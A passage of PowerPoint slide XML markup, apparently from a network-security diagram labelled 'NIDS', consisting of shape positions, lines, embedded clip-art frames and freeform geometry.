          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="150" name="Object 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20982043-A079-321E-82CD-0B86B59CA7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8944847" y="3391509"/>
          <a:ext cx="1498594" cy="1188997"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6353" name="Clip" r:id="rId8" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="150" name="Object 96">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20982043-A079-321E-82CD-0B86B59CA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4847" y="3391509"/>
                        <a:ext cx="1498594" cy="1188997"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Line 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85CB24DF-F138-5511-8107-01660DD21173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6363424" y="5889048"/>
            <a:ext cx="2081648" cy="11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52" name="Line 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8804E9A1-109E-3C41-810E-9A236BE9FD7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8465156" y="4250456"/>
            <a:ext cx="1205" cy="199202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53" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A044215-3564-345F-381F-8D3529508083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8573706" y="6175474"/>
            <a:ext cx="404765" cy="11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sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0C10F-8822-095F-EAB5-04276377FA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8573706" y="4346674"/>
            <a:ext cx="404765" cy="11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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="157" name="Object 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF390001-8CDD-DEAF-2276-1D5DAF2C6DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4194320" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6354" name="Clip" r:id="rId9" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="157" name="Object 97">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF390001-8CDD-DEAF-2276-1D5DAF2C6D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4320" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="158" name="Object 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08517C49-6BE1-C715-7812-4AEE6D46C303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3216555" y="5589480"/>
          <a:ext cx="961317" cy="737251"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6355" name="Clip" r:id="rId11" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId11" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="158" name="Object 98">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08517C49-6BE1-C715-7812-4AEE6D46C3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555" y="5589480"/>
                        <a:ext cx="961317" cy="737251"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="159" name="Object 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5092E9-94D4-1795-1EDD-07C41C589005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4499120" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6356" name="Clip" r:id="rId12" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="159" name="Object 99">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5092E9-94D4-1795-1EDD-07C41C589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120" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="160" name="Object 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC07AA18-A8A0-13EC-750E-67A73CE82773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4803920" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6357" name="Clip" r:id="rId13" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId13" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="160" name="Object 100">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC07AA18-A8A0-13EC-750E-67A73CE827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3920" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="161" name="Object 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E0655E-B60C-4A6E-4943-7FE22C15DB6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5108720" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6358" name="Clip" r:id="rId14" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="161" name="Object 101">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E0655E-B60C-4A6E-4943-7FE22C15D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8720" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="162" name="Object 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE3ADD1-333C-C76F-0B10-E7DD46B841F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6364568" y="3947459"/>
          <a:ext cx="961317" cy="737251"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6359" name="Clip" r:id="rId15" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId15" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="162" name="Object 102">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE3ADD1-333C-C76F-0B10-E7DD46B841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4568" y="3947459"/>
                        <a:ext cx="961317" cy="737251"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="163" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BCFA06-3F09-4C80-6988-870B27252A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6364568" y="3998271"/>
            <a:ext cx="961317" cy="686440"/>
            <a:chOff x="2112" y="3372"/>
            <a:chExt cx="798" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="164" name="Object 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E0C6E61-2A8F-5C20-E1D7-37FFF5B19192}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2256" y="3408"/>
            <a:ext cx="455" cy="478"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s6360" name="Clip" r:id="rId16" imgW="2427316" imgH="2536569" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId16" imgW="2427316" imgH="2536569" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="164" name="Object 103">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E0C6E61-2A8F-5C20-E1D7-37FFF5B1919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56" y="3408"/>
                          <a:ext cx="455"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 name="Object 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ACC6F56-14C9-4779-4707-A3E70CF4ADC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2112" y="3372"/>
            <a:ext cx="798" cy="612"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s6361" name="Clip" r:id="rId18" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId18" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="165" name="Object 104">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ACC6F56-14C9-4779-4707-A3E70CF4AD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 y="3372"/>
                          <a:ext cx="79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6" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FBB51A-2D30-96B7-528F-9EFBAD708EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6364568" y="3998271"/>
            <a:ext cx="961317" cy="686440"/>
            <a:chOff x="3120" y="3408"/>
            <a:chExt cx="798" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="167" name="Group 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E089C5-F56C-7FAA-9A4D-45E80951F0FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="-6352946">
              <a:off x="3227" y="3445"/>
              <a:ext cx="455" cy="477"/>
              <a:chOff x="2160" y="3312"/>
              <a:chExt cx="455" cy="477"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="169" name="Freeform 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC58477-3C00-8358-1AE8-4A78C31F6A78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1849"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1849"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1849"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1849"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1849"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1849"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1849"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1849"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1849"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1849"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1849"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1849"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1849"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1849"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1849"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1849"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1849"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1849"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1849"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1849"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1849"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1849"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1849"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1849"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1849"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1849"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1849"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1849"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1849"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1849"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1849"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1849"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1849"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1849"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1849"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1849"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1849"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1849"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1849"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1849"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1849"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1849"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1849"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1849"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1849"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1849"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1849"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0 h 1849"/>
                  <a:gd name="T96" fmla="*/ 0 w 1464"/>
                  <a:gd name="T97" fmla="*/ 0 h 1849"/>
                  <a:gd name="T98" fmla="*/ 0 w 1464"/>
                  <a:gd name="T99" fmla="*/ 0 h 1849"/>
                  <a:gd name="T100" fmla="*/ 0 w 1464"/>
                  <a:gd name="T101" fmla="*/ 0 h 1849"/>
